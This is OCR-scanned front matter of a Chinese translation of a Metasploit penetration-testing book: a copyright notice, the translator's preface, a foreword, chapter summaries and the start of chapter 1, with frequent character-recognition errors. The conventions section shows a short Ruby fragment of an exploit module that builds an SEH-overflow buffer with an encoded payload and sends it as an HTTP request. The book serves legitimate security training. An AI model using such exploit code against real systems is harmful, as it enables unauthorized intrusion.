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效 字 有 版权 声明 


图 灵 社 区 的 电子 书 没有 采用 专 有 客 
户 端 ， 您 可 以 在 任意 设备 上 ， 用 自 
己 喜 欢 的 浏览 器 和 PDF 阅读 器 进行 
阅读 。 

但 您 购买 的 电子 书 仅 供 您 个 人 使 用 ， 
未 经 授权 ， 不 得 进行 传播 。 

我 们 愿意 相信 读者 具有 这 样 的 良知 
和 觉悟 ， 与 我 们 共同 保护 知识 产权 。 


如 果 购 买 者 有 侵权 行为 ， 我 们 可 能 
对 该 用 户 实 施 包括 但 不 限于 关闭 该 
帐号 等 维权 措施 ， 并 可 能 追究 法 律 
责任 。 
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研究 人 员 。 拥 有 7 年 专业 经 验 ，|T 安 全 测 
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lihuafeng1999@163.com。 
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本 书 介绍 了 时 下 流行 的 渗透 测试 框架 


到 版 本 图 书馆 CIP 数 据 核 字 (2017) 第 235909 号 


容 提 要 


Metasploit。 书 中 从 其 基本 功能 和 传统 使 用 方式 开始 ， 讲 解 编 


写 Metasploit 模块 的 基础 知识 ， 学 习 渗 透 模块 的 执行 、 构 建 与 移植 ， 详 细 解 读 客 户 端 攻 击 、Metasploit 框架 


中 的 各 种 内 置 脚本 。 


与 第 1 版 相 比 ， 第 2 版 增添 了 大 量 对 移动 设备 、SCADA、 数 据 库 、 物 联网 设备 的 渗透 案例 ， 并 讲解 


了 如 何 将 全 新 的 渗透 模块 导入 到 Metasploit。 此 外 ， 还 吉 括 了 大 量 出 色 的 专业 工具 使 用 教程 ， 采 用 了 新 版 
的 社会 工程 学 工具 包 ， 增 加 了 大 量 经 典 详实 的 渗透 模块 编写 实例 。 


本 书 适合 网 络 与 系统 安全 领域 的 技术 爱好 者 入 
员 阅 读 参 考 。 


李 华 峰 
责任 编辑 朱 d 
执行 编辑 夏 静 广 
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纪念 所 有 为 国 捐 躬 的 英勇 战士 。 
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如 果 要 选 出 2017 年 最 热门 的 词汇 ， 一 定 非 “网 络 安 全 ” 黄 属 。 从 年 初 勒 索 者 病毒 大 爆发， 到 
年 中 《中 华人 民 共 和 国 网 络 安全 法 》 的 施行 , 这 一 切 都 表明 网 络 安全 已 经 成 为 了 国家 发 展 的 一 个 
重要 问题 。 可 是 如 何 才能 有 效 保证 网 络 安全 呢 ? 


著名 电影 《 金 蝉 脱 壳 》 中 兽 经 提 到 了 一 种 特殊 的 职业 一 一 监狱 安 管 专家 。 史 泰 龙 饰 演 的 雷 ' 布 
雷 斯 林 是 最 强 的 越狱 高 手 ， 曾 在 8 年 内 成 功 逃 出 14 座 安全 防卫 工程 最 严密 的 重 刑 监狱 。 而 他 的 真 
正身 份 是 美国 国家 安全 局 的 监狱 安 管 专家 , 每 一 次 成 功 越狱 ,就 代表 他 能 找 出 该 监狱 的 安 管 漏洞 ， 
进而 强化 改善 。 现 在 和 上 面 例子 中 提 到 的 监狱 安 管 测试 相 类 似 的 网 络 安全 渗透 测试 也 应 运 而 生 。 


目前 , 我 国 的 网 络 安全 渗透 测试 行业 还 存在 着 巨大 的 缺口 。 随 着 互联 网 的 高 速 发 展 ， 对 渗透 
测试 的 需求 将 会 越 来 越 大 。 国内 的 网 络 安全 渗透 测试 正 处 于 起 步 阶段 , 从 业 人 员 大 都 是 编程 和 网 
络 经 验 都 极为 丰富 的 计算 机 从 业 人 员 。 不 过 ， 随 着 Metasploit 的 问世 ， 渗 透 测 试 技术 将 不 再 专属 
于 那些 高 高 在 上 的 计算 机 天 才 。Metasploit 作 为 一 款 开 源 的 渗透 测试 工具 ， 能 够 帮助 你 像 电影 
的 专业 人 士 一 样 ， 仅 赁 轻 轻 敲打 几 下 键盘 就 完成 整个 渗透 测试 。 而 你 所 需要 掌握 的 ， 只 是 殴 击 几 


个 简单 的 命令 。 


但 是 和 所 有 的 开源 软件 一 样 ， 强 大 的 Metasploit 也 一 直 都 没有 一 本 全 面 而 又 详细 的 使 用 教程 。 
这 种 情形 就 如 同 把 M16 突 击 步枪 摆 在 古代 人 面前 一 样 一 一 缺乏 系统 的 指导 和 训练 , 任何 利器 都 无 
法 发 挥 作 用 。 缺 少 一 本 详实 深入 的 教材 ， 也 正 是 像 我 这 样 的 教师 最 为 苦恼 的 。 


幸运 的 是 在 2015 年 的 时 候 ， 我 在 图 灵 社 区 发 现 了 Nipun Jaswal 编 写 的 《精通 Metasploit 渗 透 测 
试 (第 1 版 )》 而 且 还 有 幸 承 担 了 这 本 书 的 翻译 工作 。 作 者 以 丰富 的 行业 背景 、 幽 默 的 语言 风格 
使 这 本 书 异常 的 精彩 。 可 以 说 ,这 本 书 对 Metasploit 的 讲解 在 国内 甚至 国际 范围 内 都 是 极 出 色 的 。 
作为 一 名 经 验 丰 富 的 渗透 测试 专家 ，Nipun Jaswal 将 自己 的 经 验 与 Metasploit 的 实际 应 用 相 结 合 ， 
介绍 了 大 量 罕见 且 使 用 价值 极 高 的 技术 。 在 《精通 Metasploit 渗 透 测 试 (第 1 版 )》 面 世 之 后 ,我 
收 到 了 来 自 读者 的 大 量 电子 邮件 , 这 些 读 者 包括 高 校 网 络 安 全 方面 的 教师 、 专 业 从 事 网 络 渗透 测 
试 的 工程 师 、 有 志 于 此 的 大 学 生 和 爱好 者 ,甚至 还 有 从 事 网 络 安全 管理 的 警察 。 从 各 行 各 业 读 者 
的 反馈 来 看 ， 这 本 书 是 相当 成 功 的 。 


Nipun Jaswal 在 一 年 之 后 ， 将 原先 的 版 本 重新 整理 ， 又 加 入 了 大 量 与 时 俱 进 的 内 容 ， 出 版 了 


PEE 


《精通 Metasploit 渗 透 测试 (第 2 版 ))« 相对 其 他 图 书 ， 这 个 更 新 速度 可 能 显得 有 些 快 了 ， 但 是 对 
于 一 本 网 络 安全 的 图 书 来 说 , 这 个 速度 却 是 极为 合适 的 。 回 头 看 看 这 一 年 , 微软 的 操作 系统 推出 
了 多 少 补丁 ,浏览 器 的 版 本 又 升级 了 多 少 次 ， 你 就 会 明日 网 络 安全 技术 进步 得 有 多 快 了 。 


我 一 直觉 得 翻译 这 个 职业 和 演员 很 像 。 演员 为 了 演 好 一 个 角色 就 要 将 自己 想象 成 角色 , 而 翻 
译 的 时 候 , 译 者 也 要 将 自己 代入 到 作者 这 个 角色 中 ,按照 作者 的 思路 去 考虑 问题 ,其 至 模仿 作者 
的 语言 习惯 。 一 本 书 翻译 完 ， 我 发 现 自己 的 写作 习惯 居然 也 和 Nipun Jaswal 有 几 分 相像 了 。 也 正 
如 人 无 完 人 , 在 这 本 书 的 翻译 过 程 中 , 我 发 现 了 其 中 的 一 些 足 漏 和 错误 ,也 都 在 译文 中 做 出 了 修 
正 或 者 标注 。 


本 书 的 翻译 工作 完结 之 时 , 也 正 是 我 所 在 学 校 又 一 届 毕 业 生 离 校 的 时 候 。 今年 的 几 个 毕业 班 
是 我 从 事 教 学 工作 以 来 相处 时 间 最 长 的 班级 。 在 学 校 的 这 些 年 来 , 他 们 总 得 忍受 我 那些 突 发 奇想 
的 教学 方式 。 也 正 是 这 几 个 班级 的 同学 陪 我 走 过 人 生 最 为 低落 的 时 候 , 在 此 感谢 他 们 对 我 的 善意 
和 包容 ， 我 会 永远 想念 他 们 ! 

感谢 图 灵 的 朱 痢 和 夏 静 文 编辑 , 在 二 位 的 鼓励 和 帮助 引导 下 ,我 才能 顺利 地 翻译 完全 部 书稿 。 

感谢 我 的 母亲 ， 是 她 将 我 养育 成 人 , 并 在 人 生 的 每 一 个 关键 阶段 给 予 我 帮助 。 感 谢 我 深 爱 的 
妻子 和 可 爱 的 儿子 ， 感 谢 他 们 在 我 翻译 此 书 时 ， 给 我 无 条 件 的 理解 和 支持 。 

欢迎 有 志 于 从 事 网 络 安全 渗透 的 诸位 与 我 交流 ， 我 的 Email 地 址 为 lihuafeng1999@163.com。 

李 华 峰 
2017 年 6 月 于 唐山 
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随 着 科技 的 发 展 , IT 安全 已 经 不 只 是 一 项 需求 ,还 是 每 个 组 织 都 必须 遵循 的 一 项 实践 。 渗 透 
测试 是 一 种 保证 企业 和 组 织 免 受 来 自 外 部 和 内 部 威胁 ( 信息 泄露 , 对 各 种 资源 、 关 键 业 务 数据 等 
的 非法 访问 ) 的 方法 。 

专业 机 构 提 供 的 渗透 测试 和 漏洞 评估 等 服务 可 以 理解 为 雇用 一 群 专家 入 侵 组 织 的 网 络 ， 从 
而 避免 日 后 其 他 人 的 人 侵 。 不 过 ， 世 界 各 地 的 执法 机 构 对 渗透 测试 这 一 概念 有 着 完全 不 同 的 
理解 o 

渗透 测试 包括 很 多 阶段 , 通常 从 收集 目标 信息 开始 ,继而 扫描 各 种 开放 的 入 口 ( 也 就 是 端口 
扫描 )， 利 用 漏洞 进入 系统 ， 保 持 对 目标 的 访问 控制 ， 最 后 清除 所 有 痕迹 。 

最 近 ，0day 漏 洞 和 高 级 持久 性 威胁 导致 大 大 小 小 的 企业 泄露 了 关键 数据 ,占领 了 全 世界 的 网 
络 安全 舞台 。 因 此 , 渗透 测试 工程 师 的 职业 生涯 目前 充满 了 挑战 ， 他 们 必须 不 断 学习 并 掌握 最 新 
的 渗透 工具 和 技术 。 

这 本 书 用 一 种 非常 实用 的 方法 介绍 了 渗透 测试 。 作者 是 一 位 著名 的 安全 专家 ,上 至 企业 安全 
架构 ， 下 至 漏洞 模块 的 编写 ， 他 都 有 十 分 丰富 的 经 验 。 


现在 市 面 上 有 很 多 关于 渗透 测试 的 图 书 ， 也 有 很 多 图 书 介绍 了 渗透 测试 领域 的 专用 安全 工 
具 。 本 书 完美 地 结合 了 这 两 者 ， 同 时 详细 介绍 了 当前 使 用 最 为 广泛 的 渗透 测试 框架 Metasploit 的 
使 用 方法 。 

Metasploit 作 为 使 用 最 广泛 的 渗透 测试 框架 之 一 ， 从 各 类 企业 到 执法 机 构 都 能 看 到 它 的 身影 。 
Metasploit 包 含 了 1500 多 个 模块 ， 所 涉及 的 功能 涵盖 了 渗透 测试 的 各 个 阶段 ， 渗 透 测试 工程 师 利 
用 这 些 模块 可 以 轻松 完成 渗透 测试 工作 。Metasploit 不 仅 提供 了 全 面 、 有 效 的 渗透 测试 方法 ， 同 
时 还 是 一 个 开源 框架 ,提供 了 广泛 的 功能 , 例如 新 漏洞 的 开发 与 各 种 任务 的 自动 化 ， 从 而 减少 了 
大 量 的 人 工 工作 ， 也 节省 了 大 量 的 时 间 。 


2p 


zl 


在 大 型 社区 的 支持 下 ，Metasploit 的 技术 和 工具 也 不 断 更 新 。 这 个 更 新 过 程 十 分 频繁 ， 有 的 
技术 可 能 一 夜 之 间 就 更 新 了 , 因此 本 书 的 编写 过 程 也 变 得 十 分 艰难 。 我 相信 你 会 体会 到 本 书 所 涉 
及 技术 的 价值 ， 它 们 对 你 的 未 来 职业 生涯 也 会 有 很 大 的 帮助 。 


J.P. Singh 少 将 ，Shaurya Chakra 奖 章 获得 者 (已 退役 ) 
理学 硕士 、 工 商 管理 硕士 、 管 理科 学 硕士 、 哲 学 硕士 
印度 亚 米 提 大 学 主任 
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如 今 , 在 商业 领域 到 处 都 需要 渗透 测试 。 随 着 近年 来 网 络 和 计算 机 犯罪 的 逐年 递增 ,渗透 测 
试 已 经 成 为 网 络 安全 研究 的 核心 问题 之 一 。 应 用 渗透 测试 技术 可 以 有 效 地 避免 来 自 企 业内 部 和 外 
部 的 威胁 。 而 企业 应 用 渗透 测试 的 必要 性 就 在 于 它 可 以 发 现 网 络 、 系 统 或 者 应 用 程序 的 漏洞 。 此 
外 ， 由 于 渗透 测试 是 从 攻击 者 的 角度 出 发 ,因而 可 以 更 好 地 发 现 企业 的 弱点 和 威胁 。 在 发 现 系统 
中 的 各 种 潜在 缺陷 以 后 , 渗透 测试 还 要 利用 这 些 漏洞 来 评估 系统 存在 的 风险 因素 以 及 漏洞 可 能 
生 的 影响 。 


不 过 ， 渗 透 测试 能 否 成 功 很 大 程度 上 取决 于 渗透 测试 工程 师 对 目标 信息 的 掌握 情况 。 因 此 ， 
渗透 测试 工程 师 通常 会 采用 黑 盒 测 试 和 白 盒 测 试 两 种 截然 不 同 的 方法 开展 工作 。 黑 盒 测试 指 的 是 
渗透 测试 工程 师 在 事先 并 没有 目标 内 部 信息 的 情况 下 开展 的 测试 。 因 此 渗透 测试 的 第 一 步 通常 是 
系统 地 收集 目标 的 信息 。 而 在 进行 白 盒 渗透 测试 时 , 渗透 测试 工程 师 事 先 掌握 了 足够 的 目标 环境 
的 内 部 信息 ， 可 以 直接 验证 目标 系统 可 能 存在 的 安全 漏洞 。 
通常 一 次 完整 的 渗透 测试 包含 下 面 7 个 阶段 。 

(1) 前 期 交互 阶段 

在 前 期 交互 阶段 ,渗透 测试 工程 师 要 确定 渗透 测试 预期 达到 的 目标 , 并 确定 测试 的 范围 。 
透 测试 工程 师 将 在 这 个 阶段 与 客户 展开 讨论 ， 确 定 本 次 渗透 测试 的 所 有 业务 与 细节 。 

(2) 信息 收集 阶段 

在 信息 收集 阶段 , 渗透 测试 工程 师 在 确定 了 目标 和 范围 以 后 , 就 要 采用 主动 和 被 动 两 种 方法 
收集 目标 信息 。 其 中 被 动 信息 收集 可 以 在 完全 不 接触 目标 的 情况 下 进行 。 
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(3) 威胁 建 模 阶段 

在 威胁 建 模 阶段 , 渗透 测试 工程 师 要 根据 之 前 获得 的 信息 , 找 出 对 目标 系统 威胁 最 大 的 弱点 ， 
从 而 确定 最 为 高 效 的 渗透 攻击 方式 。 

(4) 漏洞 分 析 阶 段 


在 漏洞 分 析 阶 段 , 渗透 测试 工程 师 要 找到 并 确认 目标 系统 上 存在 的 已 知 的 和 未 知 的 漏洞 , 然 


后 在 实验 环境 中 进行 验证 。 
(5) 渗透 攻击 阶段 


在 渗透 攻击 阶段 , 渗透 测试 工程 师 要 利用 之 前 得 到 的 成 果 和 人 侵 目标 系统 的 漏洞 。 这 意味 着 在 
这 个 阶段 ， 渗 透 测 试 工程 师 会 尝试 去 获得 目标 系统 的 控制 权 。 


(6) 后 渗透 攻击 阶段 


在 后 渗透 攻击 阶段 ,渗透 测试 工程 师 要 开展 一 些 实际 的 入 侵 行 为 。 例 如, 盗 取 目标 计算 机 的 
某 个 机 密 文件 ， 直 接 关闭 目标 系统 ,或 者 在 目标 系统 上 创建 一 个 新 的 远程 管理 账户 ,等 等 。 一 般 
来 说 ,渗透 测试 工程 师 应 该 在 这 个 阶段 完成 渗透 攻击 后 的 所 有 工作 。 


(7) 报告 阶段 


在 报告 阶段 , 渗透 测试 工程 师 需 要 将 所 有 渗透 测试 过 程 中 的 工作 进行 汇总 , 并 以 书面 报告 的 
形式 提交 给 客户 。 报 告 中 还 应 该 包括 漏洞 修补 和 安全 升级 的 解决 方案 。 


当 渗 透 测试 的 目标 仅仅 是 一 台 计 算 机 时 ， 完 成 以 上 7 个 阶段 的 难度 似乎 不 大 。 可 是 当 渗 透 测 
试 工程 师 要 面 对 的 目标 环境 包含 数 以 百 计 的 计算 机 时 ,一 切 就 不 那么 容易 了 。 因 此 , 在 对 大 型 网 
络 进行 渗透 测试 的 时 候 , 往往 需要 使 用 自动 化 渗透 测试 框架 来 代替 手工 测试 。 可 以 设想 这 样 一 个 
场景 , 渗透 的 目标 刚好 包含 了 一 百 台 运行 着 同样 操作 系统 以 及 提供 相同 系统 服务 的 计算 机 。 如 果 
渗透 测试 工程 师 手动 对 每 一 台 计 算 机 进行 测试 , 那么 将 会 耗费 掉 大 量 的 时 间 和 精力 。 这 种 复杂 情 
况 正 是 渗透 测试 框架 可 以 应 对 的 ， 通 过 使 用 渗透 测试 框架 不 仅 会 为 渗透 测试 工程 师 节省 大 量 时 
间 , 同时 也 可 以 提供 更 多 和 更 加 灵活 的 渗透 测试 方法 。 渗透 测试 框架 可 以 帮助 你 自动 实现 大 部 分 
工作 ,例如 对 攻击 向 量 、 扫 描 过 程 、 漏 洞 识别 以 及 最 重要 的 漏洞 渗透 攻击 的 处 理 ， 从 而 节省 时 间 
并 控制 节奏 。 这 正 是 Metasploit 的 作用 所 在 。 


Metasploit 是 目前 最 优秀 ， 同 时 也 是 使 用 最 广泛 的 渗透 测试 框架 之 一 。 在 IT 安全 社区 推广 者 
的 支持 下 ，Metasploit 不 仪 满足 了 一 球 大 型 渗透 测试 工具 的 需求 ， 也 提供 了 创新 性 功能 ， 为 渗透 
测试 工程 师 带 来 了 极 大 的 便利 。 


本 书 的 目标 就 是 为 读者 介绍 世界 上 最 为 流行 的 渗透 测试 框架 Metasploit。 本 书 着 重 从 以 下 几 
个 方面 掌握 Metasploit: 渗透 攻击 、 编 写 自 定义 渗透 攻击 模块 、 移 植 渗 透 攻 击 模块 、 测 试 服务 以 
及 进行 复杂 的 客户 端 测试 。 本 书 还 会 指导 读者 将 用 指定 的 Ruby、 汇 编 或 者 脚本 语言 ( 如 Cortana ) 
编写 的 外 部 渗透 测试 模块 转换 成 Metasploit 中 的 模块 。 阅 读本 书 还 将 有 助 于 提高 读者 的 编程 能 力 。 


本 书 内 容 


第 1 章 , 走 近 Metasploit 渗 透 测试 框架 。 本 章 将 带领 我 们 使 用 Metasploit 进 行 一 次 基础 的 渗透 测试 ， 
从 而 帮助 我 们 学 习 渗 透 测试 方法 和 建立 渗透 测试 环境 此外， 还 将 系统 讲解 渗透 测试 的 各 个 阶段 。 


z 
wh 
O2 


第 2 章 , 打造 定制 化 的 Metasploit 渗 透 测 试 框 架 。 本 章 将 系统 讲解 用 来 构建 Metasploit 模 块 所 需 
的 Ruby 编 程 要 点 ， 并 对 现 有 Metasploit 模 块 的 结构 进行 说 明 。 此 外 ， 还 将 详细 介绍 如 何 完 成 扫描 
需 、 认 证 测试 工具 、 后 渗透 模块 以 及 登录 凭证 采集 模块 的 编写 。 


第 3 章 ， 渗 透 模块 的 开发 过 程 。 本 章 将 系统 演示 渗透 模块 的 开发 过 程 ， 并 研究 其 中 的 开发 要 
点 ; 此 外 , 将 讲解 如 何 使 用 程序 测试 和 调试 器 ， 以 及 如 何 通过 在 调试 器 下 观察 应 用 程序 的 行为 来 
收集 开发 所 需要 的 重要 信息 ; 最 后 , 还 将 演示 如 何 利用 这 些 收 集 到 的 重要 信息 编写 一 个 Metasploit 
模块 ， 并 讨论 绕 过 SEH 和 DEP 这 类 系统 保护 机 制 的 方法 。 


第 4 章 ， 渗 透 模块 的 移植 。 本 章 将 讲解 如 何 将 那些 已 经 公开 的 可 用 渗透 工具 移植 到 Metasploit 
框架 中 ， 重 点 描述 如 何 找 出 那些 使 用 Perl、Python 以 及 PHP 语 言 编写 的 模块 的 核心 功能 ， 并 通过 
Metasploit 库 将 这 些 模 块 转化 为 成 Metasploit 框 架 的 一 部 分 。 


第 5 章 ， 使 用 Metasploit 对 服务 进行 测试 。 本 章 将 带领 我 们 对 各 种 常见 服务 进行 渗透 测试 ， 其 
中 还 包含 了 Metasploit 中 的 一 些 重要 模块 , 这 些 模块 可 以 用 来 对 SCADA、 数 据 库 和 VOIP 服 务 进 行 
测试 。 

第 6 章 ， 虚 拟 化 测试 的 原因 和 阶段 。 本 章 将 简要 介绍 使 用 Metasploit 进 行 渗透 测试 的 过 程 ， 并 
重点 介绍 那些 可 以 协同 Metasploit 完 成 渗透 测试 任务 的 工具 ( 例如 Nmap 、Nessus 和 OpenVAS ) 以 
及 它们 在 Metasploit 中 的 使 用 方法 。 最 后 ， 将 讲解 如 何 手 动 和 自动 地 生成 报表 。 


第 7 章 ， 客 户 端 渗 透 。 本 章 将 学 习 重 点 转移 到 了 客户 端 渗透 攻击 ， 重 点 讨论 如 何 将 传统 的 客 
户 端 渗透 攻击 转变 得 更 加 复杂 、 精 准 。 首 先 , 将 介绍 一 个 基于 浏览 锅 的 渗透 模块 和 一 个 基于 文件 
格式 的 渗透 模块 ， 并 讲解 这 些 模块 对 被 渗透 的 Web 服 务 器 和 网 站 用 户 的 影响 ; 然后 ,将 展示 如 何 
通过 Metasploit 中 的 DNS 欺 骗 模块 将 浏览 器 的 渗透 模块 变 成 一 个 致命 的 武器 ; 最 后 ， 将 讲解 如 何 
使 用 Metasploit 来 完成 对 Android 和 Linux 系 统 的 渗透 。 


第 8 章 ，Metasploit 的 扩展 功能 。 本 章 将 首先 研究 Meterpreter 中 提供 的 基本 后 渗透 功能 和 高 级 
后 渗透 功能 ,并 在 此 基础 上 进行 更 深入 的 研究 ; 同时 , 还 将 讨论 一 些 更 高 级 的 和 基于 硬件 的 后 渗 
透 模块 。 

第 9 章 ， 提 高 渗透 测试 的 速度 。 本 章 的 重点 是 那些 能 加 快 渗透 测试 速度 的 策略 和 脚本 ， 其 中 
不 仅 会 讲解 如 何 加 快 渗透 测试 ， 还 会 介绍 如 何在 编写 渗透 模块 时 利用 Metasploit 中 的 辅助 功能 》 
节省 大 量 时 间 ; 最 后 ， 还 将 讨论 如 何 自动 地 完成 后 渗透 测试 。 

第 10 章 ， 利 用 Armitage 实 现 Metasploit 的 可 视 化 管理 。 本 章 将 会 讲解 当前 Metasploit 最 为 流行 
的 图 形 用 户 界 面 一 一 Armitage， 并 使 用 Armitage 对 目标 进行 扫描 和 渗透 。 此 外 ， 还 将 详细 讲解 
Cortana， 并 利用 它 来 编写 自动 化 渗透 攻击 的 脚本 。 最 后 , 将 讨论 如 何在 Armitage 中 添加 自 定义 的 
功能 和 创建 自 定义 的 界面 菜单 。 


本 书 要 求 


如 果 读 者 想 完成 本 书 中 的 示例 , 将 需要 6 到 7 台 计 算 机 ,其 中 一 台 作 为 渗透 测试 机 ， 另 外 几 台 
可 以 作为 渗透 测试 的 裔 机 。 如 果 读 者 的 硬件 资源 十 分 有 限 , 也 可 以 在 同一 台 计算 机 上 运行 多 个 虚 
拟 机 来 搭建 渗透 测试 实验 环境 。 


除 此 以 外 ， 读 者 还 需要 最 新 的 Kali Linux 安 装 镜像 文件 ，Kali 作 为 Metasploit 的 运行 平台 ， 同 
时 集成 了 本 书 提 到 的 其 他 渗透 测试 工具 。 


读者 还 需要 将 Ubuntu、Windows XP, Windows 7、Windows Server 2008 , Windows Server 2012、 
Metasploitable 2 和 Windows 10 这 些 系 统 安装 到 虚拟 机 中 ， 或 者 直接 安装 到 计算 机 上 ， 因 为 这 些 
操作 系统 将 成 为 Metasploit 渗 透 测 试 的 靶 机 。 


此 外 ， 本 书 的 每 一 章 都 提供 了 示例 中 使 用 的 其 他 工具 和 存在 漏洞 的 软件 的 下 载 链接 。 


读者 对 象 

本 书 是 Metasploit 使 用 者 的 渗透 测试 指南 ， 包 含 了 完整 的 Metasploit 渗 透 模块 开发 过 程 。 在 这 
个 过 程 中 ,你 将 会 见识 到 大 量 的 技术 和 方法 。 通 过 学 习 这 些 技术 和 方法 ,你 将 掌握 如 何 运 用 
Metasploit 框 架 ， 并 且 了 解 如 何在 高 度 安 全 的 环境 中 进行 高 级 渗透 测试 。 


排版 约定 
本 书 采用 了 不 同 的 文本 格式 ， 以 区 分 不 同类 型 的 信息 ， 以 下 是 这 些 格式 的 解释 。 
正文 中 的 代码 、 用 户 输入 会 以 等 宽 字 体 进行 表示 ， 如 :“ 这 可 以 用 ab_export 方 法 来 实现 。 
代码 块 的 表示 如 下 所 示 : 


def exploit 
connect 
weapon - "HEAD " 
weapon «« make nops(target['Offset']) 
weapon «« generate seh record(target.ret) 
weapon << make nops(19) 
weapon «« payload.encoded 
weapon << " HTTP/1.0\r\n\r\n" 
Sock.put (weapon) 
handler 
disconnect 
end 
end 


当 需 要 特别 注意 代码 块 的 某 一 部 分 时 ， 将 会 加 粗 显示 。 


weapon << make nops(target['Offset']) 
weapon «« generate seh record(target.ret) 
weapon «« make nops(19) 

weapon «« payload.encoded 


命令 行 输入 和 输出 如 下 所 示 : 


irb(main):003:1» res = a ^ b 
irb(main):004:1» return res 


新 术语 或 者 关键 词 会 使 用 黑体 表示 。 


ò 这 个 图 标 表示 提示 或 者 技巧 。 


读者 反馈 

我 们 欢迎 读者 的 反馈 意见 。 如 果 对 本 书 有 任何 的 想法 ,喜欢 或 者 不 喜欢 哪些 内 容 ， 都 可 以 告 
诉 我 们 。 这 些 反馈 意见 对 于 帮助 我 们 创作 出 对 大 家 真正 有 所 帮助 的 作品 至 关 重 要 。 

你 可 以 将 一 般 的 反馈 以 电子 邮件 的 形式 发 送 到 feedback@packtpub.com ,并 在 邮件 主题 中 注 明 
书 名 。 

如 果 你 在 某 一 方面 很 有 造 放 ， 并 且 愿 意 著 书 或 参与 合 著 ， 可 以 参考 我 们 的 作者 指南 
http://www.packtpub.com/authors ; 


客户 支持 
现在 你 已 经 是 我 们 Packt 图 书 的 尊贵 读者 了 ， 我 们 会 尽力 帮助 你 充分 利用 手中 的 书籍 。 


勘误 

虽然 我 们 已 尽力 确保 本 书 内 容 正确 , 但 出 错 仍旧 在 所 难免 。 如 果 读 者 在 书 中 发 现任 何 文字 或 
者 代码 错误 ,欢迎 将 这 些 错 误 提 交 给 我 们 ， 以 便 帮 助 我 们 改进 本 书 的 后 续 版 本 ， 从 而 避免 其 他 读 
者 产生 不 必要 的 误解 。 如 果 读 者 发 现 了 错误 ,请 访问 网 页 http://www.packtpub.com/submit-errata， 


6 前 


qi 


选择 相应 图 书 ， 


单 击 errata submission form 链 接 ， 然 后 填写 具体 的 错误 信息 即 可 。 勘 误 一 经 核实 ， 
读者 的 提交 将 被 接受 , 此 勘误 将 被 上 传 到 本 公司 网 站 或 添加 到 现 有 勘误 表 。 读者 可 以 通过 在 网 页 
http://www.packtpub.com/support 上 选择 书 名 来 查看 该 书 的 勘误 表 。 

有 关中 文 版 的 勘误 内 容 请 提交 3 


侵权 声明 


图 灵 社 区 ， 地 址 是 www.ituring.com.cn/book/2048。 


版 权 问题 是 每 一 个 媒体 都 要 面 对 的 问题 。Packt 非 常 重视 版 权 的 保护 。 如 果 读 者 发 现 我 们 的 作 
品 在 互联 网 上 以 任何 形式 被 非法 复制 , 请 


TH, 青 
请 将 可 疑 盗版 材料 的 链接 发 列 


1, 请 立即 告知 我 们 相关 网 址 或 网 站 名 称 , 以 便 我 们 采取 措施 。 
ljcopyright@Opacktpub.com。 
非常 感谢 读者 帮助 我 们 保护 作者 的 权益 。 
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走 近 Metasploit 渗 透 测试 
框架 


"RTI, AU 


MEG » 
可 渗透 o 


Binoj Koshy， 网 络 安全 专家 


渗透 测试 是 一 种 有 目的 性 的 、 针 对 目标 机 构 计算 机 系统 安全 的 检测 评估 方法 。 渗 透 测 试 可 以 


发 现 系统 的 漏洞 和 安全 机 人 


剖 方 面 的 隐患 ， 并 以 此 进行 渗透 攻击 来 取得 目标 计算 机 的 控制 权 。 通 过 


渗透 测试 可 以 知道 目标 机 构 的 计算 机 系统 是 否 易于 受到 攻击 , 现 有 的 安全 部 署 是 否 能 妥善 地 抵御 


攻击 ， 以 及 哪 部 分 安全 机 


岂可 能 被 绕 过 ， 等 等 。 渗 透 测试 的 主要 目的 是 改善 目标 机 构 的 安全 性 。 


正 所 谓 “ 工 欲 善 其 事 ， 必 先 利 其 器 ”， 渗 透 测 试 能 和 否 成 功 很 大 程度 上 取决 于 测试 时 是 否 使 用 
了 正确 的 工具 和 技术 。 渗透 测试 工程 师 必 须 选 择 正确 的 渗透 测试 工具 和 技术 , 才能 保证 任务 的 完 
成 。 当 提 到 最 优秀 的 渗透 测试 工具 时 , 安全 业界 的 绝 大 多 数 人 都 会 首先 想到 Metasploit 渗 透 框架 。 
现在 ，Metasploit 被 公认 是 进行 渗透 测试 时 最 有 效 的 安全 审计 工具 之 一 ， 它 提供 了 最 全 面 的 漏 
洞 渗 透 模块 库 ， 集 成 了 优秀 的 模块 开发 环境 ， 具 有 强大 的 信息 收集 和 Web 测 试 能 力 及 其 他 许多 


功能 。 


本 书 不 仅 介 绍 了 Metasploit 渗 透 框架 的 功能 与 用 法 ， 同 时 也 重点 讲解 了 如 何 开 发 Metasploit 模 
块 和 扩展 Metasploit 框 架 。 本 书 假 定 读者 已 经 掌握 了 Metasploit 渗 透 框 架 的 基础 知识 。 在 本 书 的 部 
分 章节 中 ， 我 们 也 将 带领 读者 回顾 一 些 Metasploit 涂 透 框架 的 基础 性 操作 。 


根据 本 书 涵盖 的 所 有 知识 ， 我 们 将 按照 下 图 所 示 的 流程 进行 讲述 。 


M loit 进 行 渗 SR 
nh e E 使 用 Metasploit 实 施 完整 的 渗透 测试 


使 用 Metasploit 实 施 客 户 端 攻击 


使 用 Metasploit 对 各 种 应 用 程序 使 用 Metasploit 开 发 高 级 
进行 fuzz 测 试 ， 并 编写 渗透 模块 Post 渗 透 模 块 


使 用 Metasploit 加 快 渗透 测试 的 速度 


使 用 Armitage， 并 为 其 


脚本 来 进行 渗透 测试 


本 章 将 回顾 渗透 测试 和 Metasploit 渗 透 框架 的 基础 内 容 ， 这 有 助 于 我 们 学 习 后 面 的 内 容 。 
本 章 将 着 眼 于 以 下 几 个 要 点 。 


a 渗透 测试 的 各 个 阶段 

口 Metasploit 框 架 的 基本 操作 

a 渗透 模块 的 作用 

O 使 用 Metasploit 对 目标 网 络 进 行 渗 透 测试 
口 使 用 数据 库 的 优势 


正如 “罗马 不 是 一 天 就 能 建成 的 "， 我 们 也 不 可 能 一 天 就 成 为 专家 级 的 渗透 测试 工程 师 。 从 
个 菜鸟 转 变 成 一 个 渗透 高 手 需 要 大 量 的 实践 工作 ,熟悉 工作 环境 ,具备 对 危急 情况 的 处 理 经 验 ， 
而 最 为 重要 的 是 ,需要 在 反复 的 渗透 测试 工作 中 不 断 加 深 自己 对 该 技能 的 领悟 。 


要 对 一 个 目标 进行 渗透 测试 ， 首 先 必须 确保 安全 测试 计划 遵循 了 渗透 测试 执行 标准 
( Penetration Testing Execution Standard, PTES )。 如 果 对 渗透 测试 的 流程 并 不 了 解 ， 可 以 登录 
http://www.pentest-tandard.org/index.php/PTES_Technical Guidelines 来 学 习 渗 透 测 试 和 安全 分 析 部 
